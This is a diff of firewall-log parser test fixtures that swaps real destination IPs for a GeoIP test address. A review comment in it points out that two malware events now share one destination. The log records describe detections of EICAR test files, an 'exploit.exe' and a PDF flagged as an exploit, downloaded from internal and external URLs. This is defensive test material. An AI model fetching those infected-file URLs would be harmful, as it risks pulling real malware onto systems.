- "original": "2019-08-15T16:07:19Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 52.59.244.233, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: Debian APT-HTTP/1.3 (1.6.11), Client: Advanced Packaging Tool, ClientVersion: 1.3, ApplicationProtocol: HTTP, WebApplication: Ubuntu, ConnectionDuration: 1, InitiatorPackets: 1359, ResponderPackets: 29001, InitiatorBytes: 97454, ResponderBytes: 41319018, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: eu-central-1.ec2.archive.ubuntu.com, URL: http://eu-central-1.ec2.archive.ubuntu.com/ubuntu/pool/main/m/manpages/manpages-dev_4.15-1_all.deb",
+ "ingested": "2021-12-09T13:35:19.255518700Z",
+ "original": "2019-08-15T16:07:19Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: Debian APT-HTTP/1.3 (1.6.11), Client: Advanced Packaging Tool, ClientVersion: 1.3, ApplicationProtocol: HTTP, WebApplication: Ubuntu, ConnectionDuration: 1, InitiatorPackets: 1359, ResponderPackets: 29001, InitiatorBytes: 97454, ResponderBytes: 41319018, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: eu-central-1.ec2.archive.ubuntu.com, URL: http://eu-central-1.ec2.archive.ubuntu.com/ubuntu/pool/main/m/manpages/manpages-dev_4.15-1_all.deb",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-15T16:07:18.000Z",
@@ -781,7 +787,7 @@
 "responder_packets": "29001",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "52.59.244.233",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "tcp",
@@ -823,26 +829,26 @@
 "destination": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "DE-ST",
- "city_name": "Magdeburg",
- "country_iso_code": "DE",
- "country_name": "Germany",
- "region_name": "Saxony-Anhalt",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": 11.6167,
- "lat": 52.1333
+ "lon": -1.3614,
+ "lat": 51.7095
 }
 },
 "as": {
- "number": 43341,
+ "number": 20712,
 "organization": {
- "name": "MDlink online service center GmbH"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "213.211.198.62",
+ "address": "81.2.69.144",
 "port": 80,
 "bytes": 74,
- "ip": "213.211.198.62",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -888,7 +894,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "213.211.198.62"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -896,8 +902,8 @@
 },
 "event": {
 "severity": 1,
- "ingested": "2021-09-07T12:22:07.428858300Z",
- "original": "2019-08-16T09:33:15Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 213.211.198.62, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity",
+ "ingested": "2021-12-09T13:35:19.255524100Z",
+ "original": "2019-08-16T09:33:15Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity",
 "code": "430002",
 "kind": "event",
 "action": "connection-started",
@@ -927,7 +933,7 @@
 "prefilter_policy": "Default Prefilter Policy",
 "nap_policy": "Balanced Security and Connectivity",
 "ingress_zone": "input-zone",
- "dst_ip": "213.211.198.62",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_port": "46000",
 "src_ip": "10.0.1.20",
@@ -954,26 +960,26 @@
 "destination": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "DE-ST",
- "city_name": "Magdeburg",
- "country_iso_code": "DE",
- "country_name": "Germany",
- "region_name": "Saxony-Anhalt",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": 11.6167,
- "lat": 52.1333
+ "lon": -1.3614,
+ "lat": 51.7095
 }
 },
 "as": {
- "number": 43341,
+ "number": 20712,
 "organization": {
- "name": "MDlink online service center GmbH"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "213.211.198.62",
+ "address": "81.2.69.144",
 "port": 80,
 "bytes": 690,
- "ip": "213.211.198.62",
+ "ip": "81.2.69.144",
 "packets": 4
 },
 "source": {
@@ -1028,7 +1034,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "213.211.198.62"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -1042,8 +1048,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-09-07T12:22:07.428859400Z",
- "original": "2019-08-16T09:33:15Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 213.211.198.62, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 503, ResponderBytes: 690, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: www.eicar.org, URL: http://www.eicar.org/download/eicar_com.zip",
+ "ingested": "2021-12-09T13:35:19.255529400Z",
+ "original": "2019-08-16T09:33:15Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 503, ResponderBytes: 690, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: www.eicar.org, URL: http://www.eicar.org/download/eicar_com.zip",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-16T09:33:15.000Z",
@@ -1072,7 +1078,7 @@
 "responder_packets": "4",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "213.211.198.62",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "tcp",
@@ -1166,7 +1172,7 @@
 },
 "event": {
 "severity": 1,
- "ingested": "2021-09-07T12:22:07.428860400Z",
+ "ingested": "2021-12-09T13:35:19.255534900Z",
 "original": "2019-08-16T09:35:15Z firepower %FTD-1-430002: AccessControlRuleAction: Block, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Block-inbound-ICMP, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 0, ResponderPackets: 0, InitiatorBytes: 0, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity",
 "code": "430002",
 "kind": "event",
@@ -1298,7 +1304,7 @@
 "event": {
 "severity": 1,
 "duration": 1000000000,
- "ingested": "2021-09-07T12:22:07.428861400Z",
+ "ingested": "2021-12-09T13:35:19.255540300Z",
 "original": "Aug 14 2019 15:09:41 siem-ftd %FTD-1-430003: AccessControlRuleAction: Block, AccessControlRuleReason: File Block, SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41544, DstPort: 8000, Protocol: tcp, IngressInterface: input, EgressInterface: output, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 1, FileCount: 1, InitiatorPackets: 4, ResponderPackets: 7, InitiatorBytes: 365, ResponderBytes: 1927, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: 10.0.100.30:8000, URL: http://10.0.100.30:8000/eicar_com.zip",
 "code": "430003",
 "kind": "event",
diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log
index 5a6fe1852f7..fae3c9aebf8 100644
--- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log
+++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log
@@ -5,6 +5,6 @@ Aug 14 2019 15:01:41 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.
 Aug 14 2019 15:03:28 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41540, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, ThreatName: Unknown, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:03:27Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip
 Aug 14 2019 15:03:33 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41542, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, ThreatName: Unknown, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:03:31Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip
 Aug 14 2019 15:09:43 siem-ftd %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41544, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Malware Block, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, ThreatScore: 76, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:09:40Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip
-2019-08-16T09:39:03Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 213.211.198.62, SrcPort: 46004, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:39:02Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: File Size Is Too Small, URI: http://www.eicar.org/download/eicar_com.zip
+2019-08-16T09:39:03Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46004, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:39:02Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: File Size Is Too Small, URI: http://www.eicar.org/download/eicar_com.zip
 2019-08-16T09:40:45Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55378, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Unknown, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:40:45Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: Sent for Analysis, FileStaticAnalysisStatus: Failed to Send, URI: http://10.0.100.30/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d
-2019-08-16T09:42:07Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 18.197.225.123, SrcPort: 47926, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Pdf.Exploit.Pdfka::100.sbx.tg, ThreatScore: 100, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:42:06Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: Failed to Send, URI: http://18.197.225.123/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d
+2019-08-16T09:42:07Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47926, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Pdf.Exploit.Pdfka::100.sbx.tg, ThreatScore: 100, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:42:06Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: Failed to Send, URI: http://81.2.69.144/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d
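Review bot: Both external download hosts in this hunk are collapsed onto the single test address 81.2.69.144, so the two 430005 events (the eicar.org zip lookup on the first changed line and the PDF fetch on the last) now produce identical destination.geo and destination.as enrichment in the expected output and can no longer be told apart by destination. A pipeline regression that enriched the wrong side or reused one GeoIP result across events would therefore still pass this fixture. If the supported GeoIP test subset offers a second address, give the PDF host (the line whose URI also changes to `http://81.2.69.144/public/infected/...`) that address so each event keeps a distinct destination. The earlier events in the file still target the private 10.0.100.30, which this hunk leaves unchanged.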
diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json
index 38c14663f52..0a3f9cc5b09 100644
--- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json
+++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json
@@ -61,7 +61,7 @@
 },
 "event": {
 "severity": 1,
- "ingested": "2021-09-07T12:22:08.902870600Z",
+ "ingested": "2021-12-09T13:35:21.450128Z",
 "original": "Aug 14 2019 14:54:25 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41522, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: exploit.exe, FileType: ELF, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T14:54:24Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/exploit.exe",
 "code": "430004",
 "kind": "alert",
@@ -163,7 +163,7 @@
 },
 "event": {
 "severity": 1,
- "ingested": "2021-09-07T12:22:08.902876600Z",
+ "ingested": "2021-12-09T13:35:21.450136100Z",
 "original": "Aug 14 2019 14:55:02 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41526, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: exploit.exe, FileType: ELF, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T14:55:01Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/exploit.exe",
 "code": "430004",
 "kind": "alert",
@@ -265,7 +265,7 @@
 },
 "event": {
 "severity": 1,
- "ingested": "2021-09-07T12:22:08.902877800Z",
+ "ingested": "2021-12-09T13:35:21.450162100Z",
 "original": "Aug 14 2019 15:00:29 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41530, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: eicar.com, FileType: EICAR, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:00:27Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar.com",
 "code": "430004",
 "kind": "alert",
@@ -367,7 +367,7 @@
 },
 "event": {
 "severity": 1,
- "ingested": "2021-09-07T12:22:08.902878900Z",
+ "ingested": "2021-12-09T13:35:21.450167300Z",
 "original": "Aug 14 2019 15:01:41 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41534, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: eicar.com.txt, FileType: EICAR, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:01:40Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar.com.txt",
 "code": "430004",
 "kind": "alert",
@@ -476,7 +476,7 @@
 },
 "event": {
 "severity": 1,
- "ingested": "2021-09-07T12:22:08.902879800Z",
+ "ingested": "2021-12-09T13:35:21.450172700Z",
 "original": "Aug 14 2019 15:03:28 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41540, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, ThreatName: Unknown, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:03:27Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip",
 "code": "430004",
 "kind": "alert",
@@ -589,7 +589,7 @@
 },
 "event": {
 "severity": 1,
- "ingested": "2021-09-07T12:22:08.902880800Z",
+ "ingested": "2021-12-09T13:35:21.450177500Z",
 "original": "Aug 14 2019 15:03:33 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41542, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, ThreatName: Unknown, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:03:31Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip",
 "code": "430004",
 "kind": "alert",
@@ -702,7 +702,7 @@
 },
 "event": {
 "severity": 1,
- "ingested": "2021-09-07T12:22:08.902881800Z",
+ "ingested": "2021-12-09T13:35:21.450181500Z",
 "original": "Aug 14 2019 15:09:43 siem-ftd %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41544, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Malware Block, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, ThreatScore: 76, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:09:40Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip",
 "code": "430005",
 "kind": "alert",
@@ -758,25 +758,25 @@
 "destination": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "DE-ST",
- "city_name": "Magdeburg",
- "country_iso_code": "DE",
- "country_name": "Germany",
- "region_name": "Saxony-Anhalt",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": 11.6167,
- "lat": 52.1333
+ "lon": -1.3614,
+ "lat": 51.7095
 }
 },
 "as": {
- "number": 43341,
+ "number": 20712,
 "organization": {
- "name": "MDlink online service center GmbH"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "213.211.198.62",
+ "address": "81.2.69.144",
 "port": 80,
- "ip": "213.211.198.62"
+ "ip": "81.2.69.144"
 },
 "source": {
 "port": 46004,
@@ -828,7 +828,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "213.211.198.62"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -836,8 +836,8 @@
 },
 "event": {
 "severity": 1,
- "ingested": "2021-09-07T12:22:08.902882800Z",
- "original": "2019-08-16T09:39:03Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 213.211.198.62, SrcPort: 46004, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:39:02Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: File Size Is Too Small, URI: http://www.eicar.org/download/eicar_com.zip",
+ "ingested": "2021-12-09T13:35:21.450201900Z",
+ "original": "2019-08-16T09:39:03Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46004, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:39:02Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: File Size Is Too Small, URI: http://www.eicar.org/download/eicar_com.zip",
 "code": "430005",
 "kind": "alert",
 "start": "2019-08-16T09:39:02Z",
@@ -866,7 +866,7 @@
 "file_sandbox_status": "File Size Is Too Small",
 "uri": "http://www.eicar.org/download/eicar_com.zip",
 "file_sha256": "2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad",
- "dst_ip": "213.211.198.62",
+ "dst_ip": "81.2.69.144",
 "file_size": "184",
 "src_port": "46004",
 "src_ip": "10.0.1.20",
@@ -950,7 +950,7 @@
 },
 "event": {
 "severity": 1,
- "ingested": "2021-09-07T12:22:08.902883800Z",
+ "ingested": "2021-12-09T13:35:21.450207500Z",
 "original": "2019-08-16T09:40:45Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55378, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Unknown, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:40:45Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: Sent for Analysis, FileStaticAnalysisStatus: Failed to Send, URI: http://10.0.100.30/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d",
 "code": "430005",
 "kind": "alert",
@@ -1005,25 +1005,25 @@
 "destination": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "DE-HE",
- "city_name": "Frankfurt am Main",
- "country_iso_code": "DE",
- "country_name": "Germany",
- "region_name": "Hesse",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": 8.6843,
- "lat": 50.1188
+ "lon": -1.3614,
+ "lat": 51.7095
 }
 },
 "as": {
- "number": 16509,
+ "number": 20712,
 "organization": {
- "name": "Amazon.com, Inc."
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "18.197.225.123",
+ "address": "81.2.69.144",
 "port": 80,
- "ip": "18.197.225.123"
+ "ip": "81.2.69.144"
 },
 "source": {
 "port": 47926,
@@ -1032,9 +1032,9 @@
 },
 "url": {
 "path": "/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d",
- "original": "http://18.197.225.123/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d",
+ "original": "http://81.2.69.144/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d",
 "scheme": "http",
- "domain": "18.197.225.123"
+ "domain": "81.2.69.144"
 },
 "tags": [
 "preserve_original_event"
@@ -1074,7 +1074,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "18.197.225.123"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -1082,8 +1082,8 @@
 },
 "event": {
 "severity": 1,
- "ingested": "2021-09-07T12:22:08.902884700Z",
